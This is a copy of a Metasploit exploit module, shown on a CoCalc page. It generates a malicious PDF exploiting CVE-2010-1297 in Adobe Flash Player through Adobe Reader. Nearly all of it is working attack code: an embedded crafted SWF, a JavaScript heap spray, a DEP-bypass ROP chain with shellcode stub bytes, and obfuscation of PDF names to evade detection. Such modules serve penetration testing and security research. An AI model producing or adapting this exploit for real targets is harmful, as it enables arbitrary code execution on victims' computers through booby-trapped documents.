CoCalc -- adobe_flashplayer

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/adobe_flashplayer_newfunction.rb
Views: ¹¹⁷⁸⁴
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
require 'zlib'
7

8
class MetasploitModule < Msf::Exploit::Remote
9
  Rank = NormalRanking
10

11
  include Msf::Exploit::FILEFORMAT
12

13
  def initialize(info = {})
14
    super(update_info(info,
15
      'Name'           => 'Adobe Flash Player "newfunction" Invalid Pointer Use',
16
      'Description'    => %q{
17
          This module exploits a vulnerability in the DoABC tag handling within
18
        versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also
19
        vulnerable, as are any other applications that may embed Flash player.
20

21
        Arbitrary code execution is achieved by embedding a specially crafted Flash
22
        movie into a PDF document. An AcroJS heap spray is used in order to ensure
23
        that the memory used by the invalid pointer issue is controlled.
24

25
        NOTE: This module uses a similar DEP bypass method to that used within the
26
        adobe_libtiff module. This method is unlikely to work across various
27
        Windows versions due a the hardcoded syscall number.
28
      },
29
      'License'        => MSF_LICENSE,
30
      'Author'         =>
31
        [
32
          'Unknown',   # Found being openly exploited
33
          'jduck'      # Metasploit version
34
        ],
35
      'References'     =>
36
        [
37
          ['CVE', '2010-1297'],
38
          ['OSVDB', '65141'],
39
          ['BID', '40586'],
40
          ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],
41
          # For SWF->PDF embedding
42
          ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']
43
        ],
44
      'DefaultOptions' =>
45
        {
46
          'EXITFUNC'             => 'process',
47
          'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',
48
          'DisablePayloadHandler' => true
49
        },
50
      'Payload'        =>
51
        {
52
          'Space'    => 1000,
53
          'BadChars' => "\x00",
54
          'DisableNops' => true
55
        },
56
      'Platform'       => 'win',
57
      'Targets'        =>
58
        [
59
          # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd
60
          # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
61
          # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd
62
          [ 'Automatic', { }],
63
        ],
64
      'DisclosureDate' => '2010-06-04',
65
      'DefaultTarget'  => 0))
66

67
    register_options(
68
      [
69
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),
70
      ])
71
  end
72

73
  def exploit
74
    swf_data = make_swf()
75
    js_data = make_js(payload.encoded)
76

77
    # Create the pdf
78
    pdf = make_pdf(swf_data, js_data)
79

80
    print_status("Creating '#{datastore['FILENAME']}' file...")
81

82
    file_create(pdf)
83
  end
84

85
  def make_swf
86
    # load the static swf file
87
    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2010-1297.swf" )
88
    fd = File.open( path, "rb" )
89
    swf_data = fd.read(fd.stat.size)
90
    fd.close
91
    swf_data
92
  end
93

94
  def make_js(encoded_payload)
95

96
    # The following executes a ret2lib using BIB.dll
97
    # The effect is to bypass DEP and execute the shellcode in an indirect way
98
    stack_data = [
99
      0xc0c0c0c,
100
      0x7004919,      # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret
101
      0xcccccccc,
102
      0x70048ef,      # xchg eax,esp / ret
103
      0x700156f,      # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]
104
      0xcccccccc,
105
      0x7009084,      # ret
106
      0x7009084,      # ret
107
      0x7009084,      # ret
108
      0x7009084,      # ret
109
      0x7009084,      # ret
110
      0x7009084,      # ret
111
      0x7009033,      # ret 0x18
112
      0x7009084,      # ret
113
      0xc0c0c0c,
114
      0x7009084,      # ret
115
      0x7009084,      # ret
116
      0x7009084,      # ret
117
      0x7009084,      # ret
118
      0x7009084,      # ret
119
      0x7009084,      # ret
120
      0x7009084,      # ret
121
      0x7009084,      # ret
122
      0x7001599,      # pop ebp / ret
123
      0x10124,
124
      0x70072f7,      # pop eax / ret
125
      0x10104,
126
      0x70015bb,      # pop ecx / ret
127
      0x1000,
128
      0x700154d,      # mov [eax], ecx / ret
129
      0x70015bb,      # pop ecx / ret
130
      0x7ffe0300,     # -- location of KiFastSystemCall
131
      0x7007fb2,      # mov eax, [ecx] / ret
132
      0x70015bb,      # pop ecx / ret
133
      0x10011,
134
      0x700a8ac,      # mov [ecx], eax / xor eax,eax / ret
135
      0x70015bb,      # pop ecx / ret
136
      0x10100,
137
      0x700a8ac,      # mov [ecx], eax / xor eax,eax / ret
138
      0x70072f7,      # pop eax / ret
139
      0x10011,
140
      0x70052e2,      # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)
141
      0x7005c54,      # pop esi / add esp,0x14 / ret
142
      0xffffffff,
143
      0x10100,
144
      0x0,
145
      0x10104,
146
      0x1000,
147
      0x40,
148
      # The next bit effectively copies data from the interleaved stack to the memory
149
      # pointed to by eax
150
      # The data copied is:
151
      # \x5a\x90\x54\x90\x5a\xeb\x15\x58\x8b\x1a\x89\x18\x83\xc0\x04\x83
152
      # \xc2\x04\x81\xfb\x0c\x0c\x0c\x0c\x75\xee\xeb\x05\xe8\xe6\xff\xff
153
      # \xff\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xff\xff\xff\x90
154
      0x700d731,      # mov eax, [ebp-0x24] / ret
155
      0x70015bb,      # pop ecx / ret
156
      0x9054905a,
157
      0x700154d,      # mov [eax], ecx / ret
158
      0x700a722,      # add eax, 4 / ret
159
      0x70015bb,      # pop ecx / ret
160
      0x5815eb5a,
161
      0x700154d,      # mov [eax], ecx / ret
162
      0x700a722,      # add eax, 4 / ret
163
      0x70015bb,      # pop ecx / ret
164
      0x18891a8b,
165
      0x700154d,      # mov [eax], ecx / ret
166
      0x700a722,      # add eax, 4 / ret
167
      0x70015bb,      # pop ecx / ret
168
      0x8304c083,
169
      0x700154d,      # mov [eax], ecx / ret
170
      0x700a722,      # add eax, 4 / ret
171
      0x70015bb,      # pop ecx / ret
172
      0xfb8104c2,
173
      0x700154d,      # mov [eax], ecx / ret
174
      0x700a722,      # add eax, 4 / ret
175
      0x70015bb,      # pop ecx / ret
176
      0xc0c0c0c,
177
      0x700154d,      # mov [eax], ecx / ret
178
      0x700a722,      # add eax, 4 / ret
179
      0x70015bb,      # pop ecx / ret
180
      0x5ebee75,
181
      0x700154d,      # mov [eax], ecx / ret
182
      0x700a722,      # add eax, 4 / ret
183
      0x70015bb,      # pop ecx / ret
184
      0xffffe6e8,
185
      0x700154d,      # mov [eax], ecx / ret
186
      0x700a722,      # add eax, 4 / ret
187
      0x70015bb,      # pop ecx / ret
188
      0x909090ff,
189
      0x700154d,      # mov [eax], ecx / ret
190
      0x700a722,      # add eax, 4 / ret
191
      0x70015bb,      # pop ecx / ret
192
      0x90909090,
193
      0x700154d,      # mov [eax], ecx / ret
194
      0x700a722,      # add eax, 4 / ret
195
      0x70015bb,      # pop ecx / ret
196
      0x90909090,
197
      0x700154d,      # mov [eax], ecx / ret
198
      0x700a722,      # add eax, 4 / ret
199
      0x70015bb,      # pop ecx / ret
200
      0x90ffffff,
201
      0x700154d,      # mov [eax], ecx / ret
202
      0x700d731,      # mov eax, [ebp-0x24] / ret
203
      0x700112f       # call eax -- (execute stub to transition to full shellcode)
204
    ].pack('V*')
205

206
    var_unescape  = rand_text_alpha(rand(100) + 1)
207
    var_shellcode = rand_text_alpha(rand(100) + 1)
208

209
    var_start     = rand_text_alpha(rand(100) + 1)
210

211
    var_s         = 0x10000
212
    var_c         = rand_text_alpha(rand(100) + 1)
213
    var_b         = rand_text_alpha(rand(100) + 1)
214
    var_d         = rand_text_alpha(rand(100) + 1)
215
    var_3         = rand_text_alpha(rand(100) + 1)
216
    var_i         = rand_text_alpha(rand(100) + 1)
217
    var_4         = rand_text_alpha(rand(100) + 1)
218

219
    payload_buf = ''
220
    payload_buf << stack_data
221
    payload_buf << encoded_payload
222

223
    escaped_payload = Rex::Text.to_unescape(payload_buf)
224

225
    js = %Q|
226
var #{var_unescape} = unescape;
227
var #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );
228
var #{var_c} = #{var_unescape}( "%" + "u" + "0" + "c" + "0" + "c" + "%u" + "0" + "c" + "0" + "c" );
229
while (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};
230
#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);
231
#{var_b} += #{var_shellcode};
232
#{var_b} += #{var_c};
233
#{var_d} = #{var_b}.substring(0, #{var_s}/2);
234
while(#{var_d}.length < 0x80000) #{var_d} += #{var_d};
235
#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);
236
var #{var_4} = new Array();
237
for (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+"s";
238
|
239

240
    js
241
  end
242

243
  def random_non_ascii_string(count)
244
    result = ""
245
    count.times do
246
      result << (rand(128) + 128).chr
247
    end
248
    result
249
  end
250

251
  def io_def(id)
252
    "%d 0 obj\n" % id
253
  end
254

255
  def io_ref(id)
256
    "%d 0 R" % id
257
  end
258

259

260
  #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/
261
  def n_obfu(str)
262
    result = ""
263
    str.scan(/./u) do |c|
264
      if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'
265
        result << "#%x" % c.unpack("C*")[0]
266
      else
267
        result << c
268
      end
269
    end
270
    result
271
  end
272

273

274
  def ascii_hex_whitespace_encode(str)
275
    result = ""
276
    whitespace = ""
277
    str.each_byte do |b|
278
      result << whitespace << "%02x" % b
279
      whitespace = " " * (rand(3) + 1)
280
    end
281
    result << ">"
282
  end
283

284

285
  def make_pdf(swf, js)
286

287
    swf_name = rand_text_alpha(8 + rand(8)) + ".swf"
288

289
    xref = []
290
    eol = "\n"
291
    endobj = "endobj" << eol
292

293
    # Randomize PDF version?
294
    pdf = "%PDF-1.5" << eol
295
    #pdf << "%" << random_non_ascii_string(4) << eol
296

297
    # catalog
298
    xref << pdf.length
299
    pdf << io_def(1) << n_obfu("<</Type/Catalog")
300
    pdf << n_obfu("/Pages ") << io_ref(3)
301
    pdf << n_obfu("/OpenAction ") << io_ref(5)
302
    pdf << n_obfu(">>")
303
    pdf << eol << endobj
304

305
    # pages array
306
    xref << pdf.length
307
    pdf << io_def(3) << n_obfu("<</Type/Pages/Count 1/Kids [") << io_ref(4) << n_obfu("]>>") << eol << endobj
308

309
    # page 1
310
    xref << pdf.length
311
    pdf << io_def(4) << n_obfu("<</Type/Page/Parent ") << io_ref(3)
312
    pdf << n_obfu("/Annots [") << io_ref(7) << n_obfu("] ")
313
    pdf << n_obfu(">>")
314
    pdf << eol << endobj
315

316
    # js action
317
    xref << pdf.length
318
    pdf << io_def(5) << n_obfu("<</Type/Action/S/JavaScript/JS ") + io_ref(6) + ">>" << eol << endobj
319

320
    # js stream
321
    xref << pdf.length
322
    compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))
323
    pdf << io_def(6) << n_obfu("<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>" % compressed.length) << eol
324
    pdf << "stream" << eol
325
    pdf << compressed << eol
326
    pdf << "endstream" << eol
327
    pdf << endobj
328

329
    # swf annotation object
330
    xref << pdf.length
331
    pdf << io_def(7) << n_obfu("<</Type/Annot/Subtype/RichMedia")
332
    pdf << n_obfu("/Rect [20 20 187 69] ")
333
    pdf << n_obfu("/RichMediaSettings ") << io_ref(8)
334
    pdf << n_obfu("/RichMediaContent ") << io_ref(9)
335
    pdf << n_obfu("/NM (") << swf_name << n_obfu(")")
336
    pdf << n_obfu(">>")
337
    pdf << eol << endobj
338

339
    # rich media settings
340
    xref << pdf.length
341
    pdf << io_def(8)
342
    pdf << n_obfu("<</Type/RichMediaSettings/Subtype/Flash")
343
    pdf << n_obfu("/Activation ") << io_ref(10)
344
    pdf << n_obfu("/Deactivation ") << io_ref(11)
345
    pdf << n_obfu(">>")
346
    pdf << eol << endobj
347

348
    # rich media content
349
    xref << pdf.length
350
    pdf << io_def(9)
351
    pdf << n_obfu("<</Type/RichMediaContent")
352
    pdf << n_obfu("/Assets ") << io_ref(12)
353
    pdf << n_obfu("/Configurations [") << io_ref(14) << "]"
354
    pdf << n_obfu(">>")
355
    pdf << eol << endobj
356

357
    # rich media activation / deactivation
358
    xref << pdf.length
359
    pdf << io_def(10)
360
    pdf << n_obfu("<</Type/RichMediaActivation/Condition/PO>>")
361
    pdf << eol << endobj
362

363
    xref << pdf.length
364
    pdf << io_def(11)
365
    pdf << n_obfu("<</Type/RichMediaDeactivation/Condition/XD>>")
366
    pdf << eol << endobj
367

368
    # rich media assets
369
    xref << pdf.length
370
    pdf << io_def(12)
371
    pdf << n_obfu("<</Names [(#{swf_name}) ") << io_ref(13) << n_obfu("]>>")
372
    pdf << eol << endobj
373

374
    # swf embeded file ref
375
    xref << pdf.length
376
    pdf << io_def(13)
377
    pdf << n_obfu("<</Type/Filespec /EF <</F ") << io_ref(16) << n_obfu(">> /F(#{swf_name})>>")
378
    pdf << eol << endobj
379

380
    # rich media configuration
381
    xref << pdf.length
382
    pdf << io_def(14)
383
    pdf << n_obfu("<</Type/RichMediaConfiguration/Subtype/Flash")
384
    pdf << n_obfu("/Instances [") << io_ref(15) << n_obfu("]>>")
385
    pdf << eol << endobj
386

387
    # rich media isntance
388
    xref << pdf.length
389
    pdf << io_def(15)
390
    pdf << n_obfu("<</Type/RichMediaInstance/Subtype/Flash")
391
    pdf << n_obfu("/Asset ") << io_ref(13)
392
    pdf << n_obfu(">>")
393
    pdf << eol << endobj
394

395
    # swf stream
396
    # NOTE: This data is already compressed, no need to compress it again...
397
    xref << pdf.length
398
    pdf << io_def(16) << n_obfu("<</Type/EmbeddedFile/Length %s>>" % swf.length) << eol
399
    pdf << "stream" << eol
400
    pdf << swf << eol
401
    pdf << "endstream" << eol
402
    pdf << endobj
403

404
    # trailing stuff
405
    xrefPosition = pdf.length
406
    pdf << "xref" << eol
407
    pdf << "0 %d" % (xref.length + 1) << eol
408
    pdf << "0000000000 65535 f" << eol
409
    xref.each do |index|
410
      pdf << "%010d 00000 n" % index << eol
411
    end
412

413
    pdf << "trailer" << eol
414
    pdf << n_obfu("<</Size %d/Root " % (xref.length + 1)) << io_ref(1) << ">>" << eol
415

416
    pdf << "startxref" << eol
417
    pdf << xrefPosition.to_s() << eol
418

419
    pdf << "%%EOF" << eol
420
    pdf
421
  end
422
end
423

424
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Product

Resources

Company

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more, all in one place.

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
